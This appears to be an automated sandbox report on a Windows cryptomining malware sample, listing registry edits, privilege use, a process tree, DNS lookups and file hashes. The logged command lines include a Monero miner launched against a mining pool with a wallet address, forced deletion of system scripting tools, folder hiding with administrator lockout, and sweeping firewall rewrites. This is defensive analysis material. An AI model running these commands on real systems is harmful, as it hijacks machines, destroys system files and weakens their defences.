| Set value (data) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 | C:\Windows\SysWOW64\netsh.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 | C:\Windows\SysWOW64\netsh.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 | C:\Windows\SysWOW64\netsh.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 | C:\Windows\SysWOW64\netsh.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 | C:\Windows\SysWOW64\netsh.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 | C:\Windows\SysWOW64\netsh.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-101 = "Provides DHCP based enforcement for NAP" | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Program Files\Common Files\Microsoft Shared\jakbpcjd\dwm.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-103 = "1.0" | C:\Windows\SysWOW64\netsh.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-2 = "Provides IPsec based enforcement for Network Access Protection" | C:\Windows\SysWOW64\netsh.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 | C:\Windows\SysWOW64\netsh.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" | C:\Program Files\Common Files\Microsoft Shared\jakbpcjd\dwm.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 | C:\Windows\SysWOW64\netsh.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 | C:\Windows\SysWOW64\netsh.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 | C:\Windows\SysWOW64\netsh.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-102 = "1.0" | C:\Windows\SysWOW64\netsh.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 | C:\Windows\SysWOW64\netsh.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 | C:\Windows\SysWOW64\netsh.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-103 = "Microsoft Corporation" | C:\Windows\SysWOW64\netsh.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 | C:\Windows\SysWOW64\netsh.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 | C:\Windows\SysWOW64\netsh.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-100 = "DHCP Quarantine Enforcement Client" | C:\Windows\SysWOW64\netsh.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-101 = "Provides Network Access Protection enforcement for EAP authenticated network connections, such as those used with 802.1X and VPN technologies." | C:\Windows\SysWOW64\netsh.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-3 = "Microsoft Corporation" | C:\Windows\SysWOW64\netsh.exe | N/A |
Runs net.exe
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Fonts\banbecud\Wscntfy.exe | N/A |
| N/A | N/A | C:\Windows\Fonts\banbecud\Wscntfy.exe | N/A |
| N/A | N/A | C:\Windows\Fonts\banbecud\Wscntfy.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\0241fed9dcf8aaad1825382591718a59f8a33255c7db87524fd5f4eb653626e0N.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\ProgramData\Microsoft\Windows\Templates\gahbpcrd\Imjpmig.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\Fonts\banbecud\Wscntfy.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Fonts\banbecud\Wscntfy.exe | N/A |
| N/A | N/A | C:\Windows\Fonts\banbecud\Wscntfy.exe | N/A |
Suspicious use of WriteProcessMemory
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\0241fed9dcf8aaad1825382591718a59f8a33255c7db87524fd5f4eb653626e0N.exe
"C:\Users\Admin\AppData\Local\Temp\0241fed9dcf8aaad1825382591718a59f8a33255c7db87524fd5f4eb653626e0N.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c attrib +r +h +s "C:\Program Files\Common Files\Microsoft Shared\jakbpcjd"
C:\Windows\system32\attrib.exe
attrib +r +h +s "C:\Program Files\Common Files\Microsoft Shared\jakbpcjd"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c Cacls "C:\Program Files\Common Files\Microsoft Shared\jakbpcjd" /t /e /c /d administrator
C:\Windows\system32\cacls.exe
Cacls "C:\Program Files\Common Files\Microsoft Shared\jakbpcjd" /t /e /c /d administrator
C:\Program Files\Common Files\Microsoft Shared\jakbpcjd\dwm.exe
"C:\Program Files\Common Files\Microsoft Shared\jakbpcjd\dwm.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c del C:\Users\Admin\AppData\Local\Temp\0241FE~1.EXE > nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c takeown /f c:\windows\system32\ftp.exe
C:\Windows\system32\takeown.exe
takeown /f c:\windows\system32\ftp.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c takeown /f c:\windows\SysWOW64\ftp.exe
C:\Windows\system32\takeown.exe
takeown /f c:\windows\SysWOW64\ftp.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c takeown /f c:\windows\system32\Wscript.exe
C:\Windows\system32\takeown.exe
takeown /f c:\windows\system32\Wscript.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c takeown /f c:\windows\SysWOW64\Wscript.exe
C:\Windows\system32\takeown.exe
takeown /f c:\windows\SysWOW64\Wscript.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c takeown /f c:\windows\system32\Cscript.exe
C:\Windows\system32\takeown.exe
takeown /f c:\windows\system32\Cscript.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c takeown /f c:\windows\SysWOW64\Cscript.exe
C:\Windows\system32\takeown.exe
takeown /f c:\windows\SysWOW64\Cscript.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls c:\windows\SysWOW64\ftp.exe /grant administrators:F
C:\Windows\system32\icacls.exe
icacls c:\windows\SysWOW64\ftp.exe /grant administrators:F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls c:\windows\system32\ftp.exe /grant administrators:F
C:\Windows\system32\icacls.exe
icacls c:\windows\system32\ftp.exe /grant administrators:F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls c:\windows\SysWOW64\Wscript.exe /grant administrators:F
C:\Windows\system32\icacls.exe
icacls c:\windows\SysWOW64\Wscript.exe /grant administrators:F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls c:\windows\system32\Wscript.exe /grant administrators:F
C:\Windows\system32\icacls.exe
icacls c:\windows\system32\Wscript.exe /grant administrators:F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls c:\windows\SysWOW64\Cscript.exe /grant administrators:F
C:\Windows\system32\icacls.exe
icacls c:\windows\SysWOW64\Cscript.exe /grant administrators:F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls c:\windows\system32\Cscript.exe /grant administrators:F
C:\Windows\system32\icacls.exe
icacls c:\windows\system32\Cscript.exe /grant administrators:F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c del /F /Q c:\windows\system32\ftp.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c del /F /Q c:\windows\SysWOW64\ftp.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c del /F /Q c:\windows\system32\Wscript.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c del /F /Q c:\windows\SysWOW64\Wscript.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c del /F /Q c:\windows\system32\Cscript.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c del /F /Q c:\windows\SysWOW64\Cscript.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c attrib +r +h +s "C:\ProgramData\Microsoft\Windows\Templates\gahbpcrd"
C:\Windows\system32\attrib.exe
attrib +r +h +s "C:\ProgramData\Microsoft\Windows\Templates\gahbpcrd"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c Cacls "C:\ProgramData\Microsoft\Windows\Templates\gahbpcrd" /t /e /c /d administrator
C:\Windows\system32\cacls.exe
Cacls "C:\ProgramData\Microsoft\Windows\Templates\gahbpcrd" /t /e /c /d administrator
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c attrib +r +h +s "C:\Program Files\common files\system\wk.ini"
C:\Windows\system32\attrib.exe
attrib +r +h +s "C:\Program Files\common files\system\wk.ini"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c Cacls "C:\Program Files\common files\system\wk.ini" /t /e /c /d administrator
C:\Windows\system32\cacls.exe
Cacls "C:\Program Files\common files\system\wk.ini" /t /e /c /d administrator
C:\ProgramData\Microsoft\Windows\Templates\gahbpcrd\Imjpmig.exe
"C:\ProgramData\Microsoft\Windows\Templates\gahbpcrd\Imjpmig.exe" -V -o xmr.crypto-pool.fr:443 -u 46SFbeVmsAAR8cFBJ3jjrqbvDheyLShJSfoiPDnoW2W2cimgZJaXCE7aKxgZ4AsUATe1ap4jHEGJ2E9jrYVf1Xb1CSAQDyU -p x -k -t 6
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c attrib +r +h +s "C:\Windows\Fonts\banbecud"
C:\Windows\system32\attrib.exe
attrib +r +h +s "C:\Windows\Fonts\banbecud"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c Cacls "C:\Windows\Fonts\banbecud" /t /e /c /d administrator
C:\Windows\system32\cacls.exe
Cacls "C:\Windows\Fonts\banbecud" /t /e /c /d administrator
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c attrib +r +h +s "C:\Program Files\common files\system\jk.ini"
C:\Windows\system32\attrib.exe
attrib +r +h +s "C:\Program Files\common files\system\jk.ini"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c Cacls "C:\Program Files\common files\system\jk.ini" /t /e /c /d administrator
C:\Windows\system32\cacls.exe
Cacls "C:\Program Files\common files\system\jk.ini" /t /e /c /d administrator
C:\Windows\Fonts\banbecud\Wscntfy.exe
C:\Windows\Fonts\banbecud\Wscntfy.exe
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net start MpsSvc&cmd.exe /c sc config MpsSvc start= auto&cmd.exe /c netsh advfirewall set allprofiles state on&netsh advfirewall set allprofiles firewallpolicy allowinbound,allowoutbound&netsh advfirewall firewall delete rule name=all protocol=tcp localport=137&netsh advfirewall firewall delete rule name=all protocol=tcp localport=138&netsh advfirewall firewall delete rule name=all protocol=tcp localport=139&netsh advfirewall firewall delete rule name=all protocol=tcp localport=445&netsh advfirewall firewall delete rule name=all protocol=udp localport=137&netsh advfirewall firewall delete rule name=all protocol=udp localport=138&netsh advfirewall firewall delete rule name=all protocol=udp localport=139&netsh advfirewall firewall add rule name=microsoft dir=in action=block protocol=TCP localport=137&netsh advfirewall firewall add rule name=microsoft dir=in action=block protocol=TCP localport=138&netsh advfirewall firewall add rule name=microsoft dir=in action=block protocol=TCP localport=139&netsh advfirewall firewall add rule name=microsoft dir=in action=block protocol=udp localport=137&netsh advfirewall firewall add rule name=microsoft dir=in action=block protocol=udp localport=138&netsh advfirewall firewall add rule name=microsoft dir=in action=block protocol=udp localport=139&cmd.exe /c netsh advfirewall firewall add rule name=microsoft dir=in action=block protocol=TCP localport=445&netsh advfirewall firewall add rule name=microsoft dir=out action=block protocol=TCP remoteport=2999&netsh advfirewall firewall add rule name=microsoft dir=out action=block protocol=TCP remoteport=3000&netsh advfirewall firewall add rule name=microsoft dir=out action=block protocol=TCP remoteport=3001&netsh advfirewall firewall add rule name=microsoft dir=out action=block protocol=TCP remoteport=3002&netsh advfirewall firewall add rule name=microsoft dir=out action=block protocol=TCP remoteport=3003&netsh advfirewall firewall add rule name=microsoft dir=out action=block protocol=TCP remoteport=3333&netsh advfirewall firewall add rule name=microsoft dir=out action=block protocol=TCP remoteport=4444&netsh advfirewall firewall add rule name=microsoft dir=out action=block protocol=TCP remoteport=5555&netsh advfirewall firewall add rule name=microsoft dir=out action=block protocol=TCP remoteport=6666&netsh advfirewall firewall add rule name=microsoft dir=out action=block protocol=TCP remoteport=7777&netsh advfirewall firewall add rule name=microsoft dir=out action=block protocol=TCP remoteport=8888&netsh advfirewall firewall add rule name=microsoft dir=out action=block protocol=TCP remoteport=9999&netsh advfirewall firewall add rule name=microsoft dir=out action=block protocol=TCP remoteport=8443&netsh advfirewall firewall add rule name=microsoft dir=out action=block protocol=TCP remoteport=8080&netsh advfirewall firewall add rule name=microsoft dir=out action=block protocol=TCP remoteport=14444&netsh advfirewall firewall add rule name=microsoft dir=out action=block protocol=TCP remoteport=14433&cmd.exe /c netsh advfirewall firewall add rule name=microsoft dir=out action=allow protocol=TCP remoteport=80&netsh advfirewall firewall add rule name=microsoft dir=out action=allow protocol=UDP remoteport=53&cmd.exe /c netsh advfirewall firewall add rule name=microsoft dir=out action=allow protocol=TCP remoteport=443
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c wmic&exit&exit
C:\Windows\SysWOW64\net.exe
net start MpsSvc
C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 start MpsSvc
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c sc config MpsSvc start= auto
C:\Windows\SysWOW64\sc.exe
sc config MpsSvc start= auto
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c netsh advfirewall set allprofiles state on
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall set allprofiles state on
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall set allprofiles firewallpolicy allowinbound,allowoutbound
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall delete rule name=all protocol=tcp localport=137
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall delete rule name=all protocol=tcp localport=138
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall delete rule name=all protocol=tcp localport=139
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall delete rule name=all protocol=tcp localport=445
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall delete rule name=all protocol=udp localport=137
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall delete rule name=all protocol=udp localport=138
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall delete rule name=all protocol=udp localport=139
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name=microsoft dir=in action=block protocol=TCP localport=137
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name=microsoft dir=in action=block protocol=TCP localport=138
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name=microsoft dir=in action=block protocol=TCP localport=139
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name=microsoft dir=in action=block protocol=udp localport=137
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name=microsoft dir=in action=block protocol=udp localport=138
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name=microsoft dir=in action=block protocol=udp localport=139
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c netsh advfirewall firewall add rule name=microsoft dir=in action=block protocol=TCP localport=445
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name=microsoft dir=in action=block protocol=TCP localport=445
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name=microsoft dir=out action=block protocol=TCP remoteport=2999
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name=microsoft dir=out action=block protocol=TCP remoteport=3000
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name=microsoft dir=out action=block protocol=TCP remoteport=3001
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name=microsoft dir=out action=block protocol=TCP remoteport=3002
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name=microsoft dir=out action=block protocol=TCP remoteport=3003
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name=microsoft dir=out action=block protocol=TCP remoteport=3333
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name=microsoft dir=out action=block protocol=TCP remoteport=4444
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name=microsoft dir=out action=block protocol=TCP remoteport=5555
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name=microsoft dir=out action=block protocol=TCP remoteport=6666
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name=microsoft dir=out action=block protocol=TCP remoteport=7777
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name=microsoft dir=out action=block protocol=TCP remoteport=8888
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name=microsoft dir=out action=block protocol=TCP remoteport=9999
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name=microsoft dir=out action=block protocol=TCP remoteport=8443
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name=microsoft dir=out action=block protocol=TCP remoteport=8080
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name=microsoft dir=out action=block protocol=TCP remoteport=14444
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name=microsoft dir=out action=block protocol=TCP remoteport=14433
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c netsh advfirewall firewall add rule name=microsoft dir=out action=allow protocol=TCP remoteport=80
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name=microsoft dir=out action=allow protocol=TCP remoteport=80
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name=microsoft dir=out action=allow protocol=UDP remoteport=53
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c netsh advfirewall firewall add rule name=microsoft dir=out action=allow protocol=TCP remoteport=443
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name=microsoft dir=out action=allow protocol=TCP remoteport=443
C:\Windows\SysWOW64\cmd.exe
cmd /c wmic process get caption,commandline,ExecutablePath,ProcessId,ParentProcessId /value >"C:\Program Files\ls.txt"&exit
C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic process get caption,commandline,ExecutablePath,ProcessId,ParentProcessId /value
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | xmr.djqwehuhfuiwe.xyz | udp |
| US | 8.8.8.8:53 | xmr.djqwehuhfuiwe.xyz | udp |
Files
C:\Program Files\Common Files\Microsoft Shared\jakbpcjd\dwm.exe
| MD5 | 99d91a5ca408888ad0139ba017c263b0 |
| SHA1 | ee00c4cbb144833ea37557e09dab4d036cf491e3 |
| SHA256 | 0241fed9dcf8aaad1825382591718a59f8a33255c7db87524fd5f4eb653626e0 |
| SHA512 | 8910a22fe0a3a660e22fb8c8220abe6df6356eea3c342614dddb658bef7bc5c200fe605abdbde0ba50a61fa0e5fef9aae9f2bd083dff0bcfd4a204ed043bc164 |
C:\ProgramData\Microsoft\Windows\Templates\gahbpcrd\Imjpmig.exe
| MD5 | d5f810d2810eb4412a5920a677d1bef1 |
| SHA1 | 5d518c9c5b1097708b80ff572501e195b381c30c |
| SHA256 | 33ca0835da8d32f6e187f8a6376720fdf5e417530df7039d01841787cf513d51 |
| SHA512 | b308b9b8ba9d801fe0d0906401263621c7a84113277202feaad50d1e832e3af80131c8794e26ad61ee4c6e62e8404b343493c2186076c9ef6d584fb8b8f09663 |
C:\Program Files\common files\system\wk.ini
| MD5 | a7b45e477cde8d6961abe2784a24cd1a |
| SHA1 | 3dd8ca9999258337da24e158d83c06bac3f546ee |
| SHA256 | 9bf4df16711b4f831cd9979af2d0b616c0530e5b1ba311b29a9b63e948248b4c |
| SHA512 | a25e27c85c5693ce198d87cf8d5d4127635aa18d50f3b48232e3dc6bb98d451f6d6c7b6acce6d0f38ddef230efb098fd5279f601befd97f4ba33daf6f4183ec9 |
memory/2832-13-0x0000000000400000-0x0000000000498000-memory.dmp
memory/1240-12-0x0000000000A70000-0x0000000000B08000-memory.dmp
C:\Windows\Fonts\banbecud\Wscntfy.exe
| MD5 | 6a45590b819f385305ef39c912c134e8 |
| SHA1 | 7916b19ad989ecd1eff12a7de52668f674335f2f |
| SHA256 | e3258f7c8e2be3a5eeaa697b80fc1b3cc64b84a933e551c802c7479b86768db4 |
| SHA512 | 1849029c7e433f5681848f0c8945d565873b2ec7164f9db71abbd3f5b59e3ad83b03f0be62666d2fc77b409565207500a2d29b30ce0a43aa8a67e7e999dd3dad |
C:\Program Files\common files\system\jk.ini
| MD5 | f895344ab3b578bd7b68364044e26d76 |
| SHA1 | bfa5f38963c424ad48b712b712627b0cc4c1055f |
| SHA256 | 8ea5212859cfd7eba7c691e3a115fffbabd8ad626629b6313ca3719952b0ef8a |
| SHA512 | 5a01cad8b4ff238b2657a2810cfc146c92fa787effa39295f9b24bfda50005db10c457a47aeb57fc2f8166a6513b6240c568c32f4199eb8a89082976349b2d84 |
memory/1752-17-0x0000000000400000-0x00000000004D3000-memory.dmp
memory/2832-19-0x0000000000400000-0x0000000000498000-memory.dmp
memory/1752-21-0x0000000000400000-0x00000000004D3000-memory.dmp
C:\Program Files\ls.txt
| MD5 | ad15cdc0461479b82fd27d06568cb72f |
| SHA1 | bdcd6c2fdd39858c304880e5d7c0dcb67ffc8745 |
| SHA256 | cbb873b0119c092380a2dc9ac9cfc0ec8c7f054c0b57f0fefe01151d9e1bc55d |
